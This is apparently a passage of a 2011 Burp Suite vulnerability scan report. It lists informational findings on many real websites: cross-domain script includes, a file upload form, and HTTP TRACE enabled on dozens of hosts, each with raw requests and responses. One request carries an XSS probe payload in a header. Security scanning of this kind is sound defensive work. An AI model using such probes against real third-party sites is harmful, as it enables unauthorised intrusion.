Host:   http://www.whosampled.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whosampled.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 02 May 2011 00:33:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Language: en-us
Expires: Mon, 02 May 2011 01:32:56 GMT
Vary: Accept-Language,Cookie,Accept-Encoding
ETag: "bd9c0f0a5f594631dc6a63c873027a4a"
Cache-Control: max-age=3600
Last-Modified: Mon, 02 May 2011 00:32:56 GMT
Content-Length: 43858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000002226507">
</script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000004378507">
</script>


<script src="http://content.dl-rms.com/rms/27732/nodetag.js"></script>
...[SNIP]...

25. File upload functionality

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.js-kit.com
Path:   /scripts/comments.js

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /scripts/comments.js HTTP/1.1
Host: cdn.js-kit.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=259200
Content-Type: application/javascript
Age: 59475
Date: Sun, 01 May 2011 23:33:49 GMT
Last-Modified: Sun, 01 May 2011 06:58:19 GMT
Expires: Wed, 04 May 2011 07:13:56 GMT
Connection: keep-alive
Content-Length: 474074


...[SNIP]...
<form class="js-kit-avatars-upload-form" method="POST" enctype="multipart/form-data" action="' + this.uriAvatar + 'add">' +
       '<input type="file" name="image" class="js-kit-avatars-upload-control" />' +
   '</form>
...[SNIP]...

26. TRACE method is enabled
There are 314 instances of this issue:


26.1. http://bh.contextweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 5e1e820ff03798f2

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Content-Type: message/http
Content-Length: 130
Date: Mon, 02 May 2011 02:01:51 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 5e1e820ff03798f2
connection: Keep-Alive
cw-userhostaddress: 173.193.214.243

26.2. http://c.statcounter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: c.statcounter.com
Cookie: 588d9b828378dc7b

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: c.statcounter.com
Cookie: 588d9b828378dc7b


26.3. http://csrc.nist.gov/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csrc.nist.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: csrc.nist.gov
Cookie: 8cbae272594a3879

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: csrc.nist.gov
Cookie: 8cbae272594a3879


26.4. http://d1.openx.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /

Request

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: be2152eec06dd95a

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: be2152eec06dd95a
X-Forwarded-For: 173.193.214.243


26.5. http://danilolee.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://danilolee.com
Path:   /

Request

TRACE / HTTP/1.0
Host: danilolee.com
Cookie: 809b46f61504bdfa

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:40:00 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: danilolee.com
Cookie: 809b46f61504bdfa


26.6. http://dg.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: dg.specificclick.net
Cookie: 57692ac2a10ce0c

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 71
Date: Mon, 02 May 2011 02:04:37 GMT
Connection: close

TRACE / HTTP/1.0
host: dg.specificclick.net
cookie: 57692ac2a10ce0c

26.7. http://digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: digg.com
Cookie: abf0c1b647a1459c

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: digg.com
Cookie: abf0c1b647a1459c
Connection: Keep-Alive
X-forwarded-for: 173.193.214.243


26.8. http://hit.blvdstatus.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hit.blvdstatus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: hit.blvdstatus.com
Cookie: a6613bb66dcd2da8

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:40:04 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: hit.blvdstatus.com
Cookie: a6613bb66dcd2da8


26.9. http://image2.pubmatic.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: a556c9e0f75ddda9

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:05:22 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: a556c9e0f75ddda9


26.10. http://metrics.washingtonpost.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.washingtonpost.com
Cookie: eb713d93a22917d8

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:47 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.washingtonpost.com
Cookie: eb713d93a22917d8
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


26.11. http://na.decdna.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /

Request

TRACE / HTTP/1.0
Host: na.decdna.net
Cookie: 628e8eb57c409ffa

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:08 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: na.decdna.net
Cookie: 628e8eb57c409ffa
Connection: Keep-Alive
DNA_IP: 173.193.214.243


26.12. http://pixel.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: dfb1c4110f6a9d76

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:04:54 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: dfb1c4110f6a9d76
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


26.13. http://sniff.visistat.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sniff.visistat.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sniff.visistat.com
Cookie: 791c1e7024399b71

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:34 GMT
Server: Apache/2.2.4 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sniff.visistat.com
Cookie: 791c1e7024399b71


26.14. http://t.mookie1.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: 370de8cdf6fb28f5

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:10 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: 370de8cdf6fb28f5
Connection: Keep-Alive
MIG_IP: 173.193.214.243


26.15. http://tags.bluekai.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: 3fa39c625ee50d60

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Content-Type: message/http
Connection: close

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: 3fa39c625ee50d60
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200


26.16. http://track.blvdstatus.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.blvdstatus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: track.blvdstatus.com
Cookie: 7847a1b13dbca795

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:36 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: track.blvdstatus.com
Cookie: 7847a1b13dbca795


26.17. http://usjobsresource.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /

Request

TRACE / HTTP/1.0
Host: usjobsresource.com
Cookie: cc7afb8b1befeb74

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:56 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: usjobsresource.com
Cookie: cc7afb8b1befeb74


26.18. http://widgets.digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: 6200694369bbc4ad

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:24:59 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 6200694369bbc4ad
Accept-Encoding: gzip
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.13
x-chpd-loop: 1
Via: 1.0 PXY002-ASHB.COTENDO.NET (chpd/4.00.0134.3)
Cneonction:
...[SNIP]...

26.19. http://www.2012-survival-guide.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2012-survival-guide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.2012-survival-guide.com
Cookie: e2c6432e9181fe4

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:51 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.2012-survival-guide.com
Cookie: e2c6432e9181fe4


26.20. http://www.3fatchicks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3fatchicks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.3fatchicks.com
Cookie: 14b8904d2e38d66a

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:50 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerthreefatchicks_pool=535040172.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.3fatchicks.com
Cookie: 14b8904d2e38d66a
Connection: Keep-Alive


26.21. http://www.4tubehd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4tubehd.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.4tubehd.com
Cookie: 3f0a6b963e88efae

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:40 GMT
Server: Apache/2.2.16 (FreeBSD) DAV/2 PHP/5.3.5 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.4tubehd.com
Cookie: 3f0a6b963e88efae


26.22. http://www.aacap.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aacap.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aacap.org
Cookie: fc9c5b55e43b37cb

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:13:51 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aacap.org
Cookie: fc9c5b55e43b37cb


26.23. http://www.abcpaydaydirect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abcpaydaydirect.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.abcpaydaydirect.com
Cookie: aa3bd7f70a184f25

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:20 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: aa3bd7f70a184f25
Host: www.abcpaydaydirect.com


26.24. http://www.abctie.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abctie.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.abctie.com
Cookie: 5701d98e173ec8d2

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:59 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.abctie.com
Cookie: 5701d98e173ec8d2


26.25. http://www.abcxml.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abcxml.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.abcxml.com
Cookie: 673b717ff873f926

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:55:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.abcxml.com
Cookie: 673b717ff873f926


26.26. http://www.acadiaferry.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acadiaferry.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.acadiaferry.com
Cookie: b27c38eb132828ed

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:48 GMT
Server: Apache/1.3.42 (Unix) Resin/2.1.13 mod_fastcgi/2.4.6 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b27c38eb132828ed
Host: www.acadiaferry.com


26.27. http://www.aces.edu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aces.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aces.edu
Cookie: 654018f6e4d78781

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:34 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aces.edu
Cookie: 654018f6e4d78781


26.28. http://www.activexguide.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.activexguide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.activexguide.com
Cookie: 6687ec2d80a23bf7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.activexguide.com
Cookie: 6687ec2d80a23bf7


26.29. http://www.add50.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.add50.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.add50.com
Cookie: dcd052edcd47e5ff

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:28 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25 PHP/5.2.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.add50.com
Cookie: dcd052edcd47e5ff


26.30. http://www.admez.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.admez.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.admez.com
Cookie: cdc640c8293e2865

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.admez.com
Cookie: cdc640c8293e2865


26.31. http://www.aggressivedeals.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aggressivedeals.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aggressivedeals.com
Cookie: e1228a33e39c9be7

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aggressivedeals.com
Cookie: e1228a33e39c9be7


26.32. http://www.allelectronics.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allelectronics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.allelectronics.com
Cookie: 7a5517350101eb7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 7a5517350101eb7
Host: www.allelectronics.com


26.33. http://www.amateursea.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amateursea.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.amateursea.com
Cookie: fb41359d82f9f63

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:27:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: fb41359d82f9f63
Host: www.amateursea.com


26.34. http://www.americanbible.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanbible.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.americanbible.org
Cookie: 8ecccbe408451c35

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:50 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.americanbible.org
Cookie: 8ecccbe408451c35


26.35. http://www.androidtablets.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidtablets.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.androidtablets.net
Cookie: b8536dc24c6ca7a6

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:39 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.androidtablets.net
Cookie: b8536dc24c6ca7a6


26.36. http://www.andypioneer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.andypioneer.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.andypioneer.com
Cookie: 65dfe0b19489010e

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:42:55 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.andypioneer.com
Cookie: 65dfe0b19489010e


26.37. http://www.anilinkz.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anilinkz.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.anilinkz.com
Cookie: b6a274b6be1e336d

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:34 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.anilinkz.com
Cookie: b6a274b6be1e336d


26.38. http://www.animatedknots.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.animatedknots.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.animatedknots.com
Cookie: 9b51388f0373b2bd

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.animatedknots.com
Cookie: 9b51388f0373b2bd


26.39. http://www.anvato.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anvato.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.anvato.com
Cookie: 6440e2452746439

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:57 GMT
Server: Apache/2.2.9 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.anvato.com
Cookie: 6440e2452746439


26.40. http://www.arkive.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arkive.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.arkive.org
Cookie: 7dcd6d1558f3bd67

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:36 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.arkive.org
Cookie: 7dcd6d1558f3bd67


26.41. http://www.arktimes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arktimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.arktimes.com
Cookie: 4effeb8713cb89b5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:29:04 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from www.arktimes.com
Connection: close

TRACE /gyrobase/Home HTTP/1.1
Connection: close
Cookie: 4effeb8713cb89b5
Host: localhost:5001
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.arktimes.com
X-Forwarded-Server: www.arktimes.com


26.42. http://www.aroj.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aroj.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aroj.com
Cookie: af268c7b8e24a861

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:23:29 GMT
Server: Apache/2.2.3 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aroj.com
Cookie: af268c7b8e24a861


26.43. http://www.askmefast.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.askmefast.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.askmefast.com
Cookie: 48c9df8a559caee6

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:50 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.askmefast.com
Cookie: 48c9df8a559caee6


26.44. http://www.askunder.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.askunder.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.askunder.com
Cookie: eca40dceee872a4

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:07:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.askunder.com
Cookie: eca40dceee872a4


26.45. http://www.autotrafficavalanche.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrafficavalanche.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.autotrafficavalanche.com
Cookie: 6850c057b3828fae

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:34 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.autotrafficavalanche.com
Cookie: 6850c057b3828fae


26.46. http://www.babesandstars.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babesandstars.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.babesandstars.com
Cookie: 143b42cd3d34589a

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.babesandstars.com
Cookie: 143b42cd3d34589a


26.47. http://www.bakugandimensions.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bakugandimensions.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bakugandimensions.com
Cookie: bee4adf468ebdbbe

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:22 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bakugandimensions.com
Cookie: bee4adf468ebdbbe


26.48. http://www.bankonyourself.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankonyourself.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bankonyourself.com
Cookie: 871589a5f91874e8

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:17:39 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bankonyourself.com
Cookie: 871589a5f91874e8


26.49. http://www.barnstormers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barnstormers.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.barnstormers.com
Cookie: c1e9d46134ee20f7

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:06 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.barnstormers.com
Cookie: c1e9d46134ee20f7
X-Forwarded-For: 173.193.214.243


26.50. http://www.baseballhall.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.baseballhall.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.baseballhall.org
Cookie: f058eda0027b25ea

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (CentOS)
Content-Type: message/http
Content-Length: 130
Date: Mon, 02 May 2011 03:48:12 GMT
X-Varnish: 804452602
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Host: www.baseballhall.org
Cookie: f058eda0027b25ea
X-Varnish: 804452602
X-Forwarded-For: 173.193.214.243


26.51. http://www.bayradio.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bayradio.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bayradio.com
Cookie: ffe73fe2f17bbb3d

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:41 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bayradio.com
Cookie: ffe73fe2f17bbb3d


26.52. http://www.beauty-advices.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beauty-advices.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.beauty-advices.com
Cookie: e892acdb1e23b5b9

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:58:27 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.beauty-advices.com
Cookie: e892acdb1e23b5b9


26.53. http://www.bigwomenpicz.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigwomenpicz.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bigwomenpicz.com
Cookie: fe8fa6eeb8a2fd82

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:43 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: fe8fa6eeb8a2fd82
Host: www.bigwomenpicz.com


26.54. http://www.billyland.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.billyland.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.billyland.com
Cookie: 5b6d30e36402547e

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:24:36 GMT
